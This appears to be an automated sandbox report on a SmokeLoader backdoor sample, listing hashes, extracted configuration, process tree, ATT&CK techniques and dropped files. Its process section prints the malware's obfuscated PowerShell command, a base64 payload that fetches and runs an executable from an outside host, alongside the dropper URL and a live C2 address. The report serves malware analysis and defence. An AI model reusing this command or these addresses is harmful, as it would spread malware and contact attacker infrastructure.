smokeloader | c508cefc2d6430d8be028c7224aac6641e0da4f072e503261b32b950e0ef21da

General

Target

2c2cb2aa0782874d3c14cdd6f063f979.exe
Size

847KB
MD5

2c2cb2aa0782874d3c14cdd6f063f979
SHA1

583c43ca939f9d8a4eea53a7d71157ac3571a350
SHA256

c508cefc2d6430d8be028c7224aac6641e0da4f072e503261b32b950e0ef21da
SHA512

34c35989b80841ce09672856ad8c52475a2fa96da1004a61d2417241a25c12e108439f1c7e4851f125ea6af412e96487da793213f63feebb5ffed8f3a97c9d26

Score

10^/10

smokeloader backdoor trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://u.teknik.io/bHrgG.jpg

Extracted

Family

smokeloader

Version

2018

C2

http://94.140.114.59/1/

rc4.i32

Signatures

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

12 1104 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

nTvWNOa.exe

pid process

1844 nTvWNOa.exe

flow	pid	process
12	1104	powershell.exe

pid	process
1844	nTvWNOa.exe

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

nTvWNOa.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	nTvWNOa.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	nTvWNOa.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

1640 powershell.exe
1640 powershell.exe
1640 powershell.exe
1104 powershell.exe
1104 powershell.exe
1104 powershell.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

nTvWNOa.exe

pid process

1844 nTvWNOa.exe
1844 nTvWNOa.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1640 powershell.exe
Token: SeDebugPrivilege 1104 powershell.exe

pid	process
1640	powershell.exe
1640	powershell.exe
1640	powershell.exe
1104	powershell.exe
1104	powershell.exe
1104	powershell.exe

pid	process
1844	nTvWNOa.exe
1844	nTvWNOa.exe

description	pid	process
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeDebugPrivilege	1104	powershell.exe

Suspicious use of FindShellTrayWindow 10 IoCs

Processes:

2c2cb2aa0782874d3c14cdd6f063f979.exe

pid	process
4092	2c2cb2aa0782874d3c14cdd6f063f979.exe
4092	2c2cb2aa0782874d3c14cdd6f063f979.exe
4092	2c2cb2aa0782874d3c14cdd6f063f979.exe
4092	2c2cb2aa0782874d3c14cdd6f063f979.exe
4092	2c2cb2aa0782874d3c14cdd6f063f979.exe
4092	2c2cb2aa0782874d3c14cdd6f063f979.exe
4092	2c2cb2aa0782874d3c14cdd6f063f979.exe
4092	2c2cb2aa0782874d3c14cdd6f063f979.exe
4092	2c2cb2aa0782874d3c14cdd6f063f979.exe
4092	2c2cb2aa0782874d3c14cdd6f063f979.exe

Suspicious use of SendNotifyMessage 10 IoCs

Processes:

2c2cb2aa0782874d3c14cdd6f063f979.exe

pid	process
4092	2c2cb2aa0782874d3c14cdd6f063f979.exe
4092	2c2cb2aa0782874d3c14cdd6f063f979.exe
4092	2c2cb2aa0782874d3c14cdd6f063f979.exe
4092	2c2cb2aa0782874d3c14cdd6f063f979.exe
4092	2c2cb2aa0782874d3c14cdd6f063f979.exe
4092	2c2cb2aa0782874d3c14cdd6f063f979.exe
4092	2c2cb2aa0782874d3c14cdd6f063f979.exe
4092	2c2cb2aa0782874d3c14cdd6f063f979.exe
4092	2c2cb2aa0782874d3c14cdd6f063f979.exe
4092	2c2cb2aa0782874d3c14cdd6f063f979.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

2c2cb2aa0782874d3c14cdd6f063f979.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4092 wrote to memory of 1640	4092	2c2cb2aa0782874d3c14cdd6f063f979.exe	powershell.exe
PID 4092 wrote to memory of 1640	4092	2c2cb2aa0782874d3c14cdd6f063f979.exe	powershell.exe
PID 4092 wrote to memory of 1640	4092	2c2cb2aa0782874d3c14cdd6f063f979.exe	powershell.exe
PID 1640 wrote to memory of 1104	1640	powershell.exe	powershell.exe
PID 1640 wrote to memory of 1104	1640	powershell.exe	powershell.exe
PID 1640 wrote to memory of 1104	1640	powershell.exe	powershell.exe
PID 1104 wrote to memory of 1844	1104	powershell.exe	nTvWNOa.exe
PID 1104 wrote to memory of 1844	1104	powershell.exe	nTvWNOa.exe
PID 1104 wrote to memory of 1844	1104	powershell.exe	nTvWNOa.exe

C:\Users\Admin\AppData\Local\Temp\2c2cb2aa0782874d3c14cdd6f063f979.exe
"C:\Users\Admin\AppData\Local\Temp\2c2cb2aa0782874d3c14cdd6f063f979.exe"
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4092

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AYgBIAHIAZwBHAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAbgBUAHYAVwBOAE8AYQAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABuAFQAdgBXAE4ATwBhAC4AZQB4AGUAHSA=
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1640

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AYgBIAHIAZwBHAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAbgBUAHYAVwBOAE8AYQAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABuAFQAdgBXAE4ATwBhAC4AZQB4AGUAHSA=
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1104

C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe
"C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe"
4⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious behavior: MapViewOfSection
PID:1844

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
b751492c41c6f3173d3b6f31c1b9b4eb

SHA1
abc53a2c939b1d774940deb0b888b7b1ba5a3c7b

SHA256
ad95fdf313324ed94997cec026239ea3631bf27298500e5def5941db9493b457

SHA512
afa65279455b98353c6fe6869f2b545231231a953afbb1bf2eaed6b11646c4b4c77c5c18102651ae247a2f0fa18c698d908f4d23ca91581cbf28e32e061cb2e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
11689413ab60f89fba82618d35522679

SHA1
a24716a57cb5a6799c6158710af070e776b9419c

SHA256
a4a3be6b195cfeef036dee9a6412e43a32d566138ff72671589ce246e55e2ba6

SHA512
fa04d0a50630b1b54d07cb57ce0e35a0195ac9694da99ab1f5536ca1c735c6198c3be1902caeb6d1ba961eddd9330ca60e2a8aeccb9626de5e0495f2fd402062

Download Submit
C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe
MD5
3cf58ec9de521b32015552ca3024d1cd

SHA1
539236ecd9d859f82f89311bfd564906aa98451e

SHA256
ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace

SHA512
25d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599

Download Submit
C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe
MD5
3cf58ec9de521b32015552ca3024d1cd

SHA1
539236ecd9d859f82f89311bfd564906aa98451e

SHA256
ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace

SHA512
25d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599

Download Submit
memory/1104-138-0x0000000006542000-0x0000000006543000-memory.dmp

Filesize
4KB

Download
memory/1104-136-0x0000000006540000-0x0000000006541000-memory.dmp

Filesize
4KB

Download
memory/1104-166-0x0000000006543000-0x0000000006544000-memory.dmp

Filesize
4KB

Download
memory/1104-154-0x0000000009E70000-0x0000000009E71000-memory.dmp

Filesize
4KB

Download
memory/1104-153-0x0000000008D80000-0x0000000008D81000-memory.dmp

Filesize
4KB

Download
memory/1104-152-0x0000000008DE0000-0x0000000008DE1000-memory.dmp

Filesize
4KB

Download
memory/1104-147-0x0000000008880000-0x0000000008881000-memory.dmp

Filesize
4KB

Download
memory/1104-146-0x00000000092F0000-0x00000000092F1000-memory.dmp

Filesize
4KB

Download
memory/1104-128-0x0000000000000000-mapping.dmp

Download
memory/1640-127-0x0000000008A50000-0x0000000008A51000-memory.dmp

Filesize
4KB

Download
memory/1640-119-0x0000000007B40000-0x0000000007B41000-memory.dmp

Filesize
4KB

Download
memory/1640-121-0x0000000008270000-0x0000000008271000-memory.dmp

Filesize
4KB

Download
memory/1640-126-0x0000000007502000-0x0000000007503000-memory.dmp

Filesize
4KB

Download
memory/1640-125-0x0000000008A00000-0x0000000008A01000-memory.dmp

Filesize
4KB

Download
memory/1640-124-0x0000000007AE0000-0x0000000007AE1000-memory.dmp

Filesize
4KB

Download
memory/1640-123-0x0000000008370000-0x0000000008371000-memory.dmp

Filesize
4KB

Download
memory/1640-170-0x0000000007504000-0x0000000007506000-memory.dmp

Filesize
8KB

Download
memory/1640-120-0x0000000007960000-0x0000000007961000-memory.dmp

Filesize
4KB

Download
memory/1640-114-0x0000000000000000-mapping.dmp

Download
memory/1640-118-0x0000000007500000-0x0000000007501000-memory.dmp

Filesize
4KB

Download
memory/1640-117-0x0000000004EF0000-0x0000000004EF1000-memory.dmp

Filesize
4KB

Download
memory/1640-122-0x0000000007A50000-0x0000000007A51000-memory.dmp

Filesize
4KB

Download
memory/1640-169-0x0000000007503000-0x0000000007504000-memory.dmp

Filesize
4KB

Download
memory/1844-159-0x0000000000000000-mapping.dmp

Download
memory/3048-168-0x0000000000D90000-0x0000000000DA5000-memory.dmp

Filesize
84KB

Download
memory/3048-167-0x0000000000DB0000-0x0000000000DB1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads